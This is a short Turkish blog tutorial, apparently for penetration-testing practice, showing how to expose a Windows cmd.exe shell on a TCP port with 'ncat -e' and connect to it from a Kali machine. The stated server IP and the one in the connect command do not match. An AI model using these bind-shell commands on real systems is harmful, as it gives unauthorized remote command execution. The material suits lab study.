Ncat Aracı Kullanılarak Windows Sunucu Bilgisayarın Komut Satırına Doğrudan (Bind) Erişim Sağlanması

Ncat (netcat), komut satırından ağ üzerinde veri okuma / yazma işlemlerini gerçekleştirmeye yarayan bir araçtır. Bu aracın Linux ve Windows sürümleri bulunmaktadır. Bu yazıda, Windows bir bilgisayar sunucu olarak kullanılacak ve kendisine ağ üzerinden bağlantı kuran Linux istemci bilgisayarın Windows komut satırına doğrudan (bind connection) erişim elde edebildiği görülecektir.

Kali bilgisayarlarda ncat aracı varsayılan olarak bulunmaktadır. Bunun yanında, Windows bilgisayar için ncat aracı Nmap sayfasından (http://nmap.org/ncat/) indirilebilir.

Windows bilgisayarın komut satırının belirli bir porttan (TCP\24680) hizmete açılması aşağıdaki gibidir.

whoami
ncat.exe -lkvvnp 24680 -e cmd.exe

acquiring-cmd-shell-on-windows-server-by-using-ncat-tool-01

Kali istemci bilgisayarından Windows sunucu bilgisayarının (192.168.234.129) açılan portu üzerinden komut satırına erişim aşağıdaki gibidir. Erişim sağlandıktan sonra, Windows sunucunun komut satırındaymış gibi komutlar çalıştırılabilir.

ncat 192.168.234.131 24680
whoami

acquiring-cmd-shell-on-windows-server-by-using-ncat-tool-02

Böylece, Windows sunucu bilgisayarında doğrudan (bind) bir bağlantının oluştuğu ve “cmd.exe” komutunun çalıştığı görülmektedir.

acquiring-cmd-shell-on-windows-server-by-using-ncat-tool-03

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.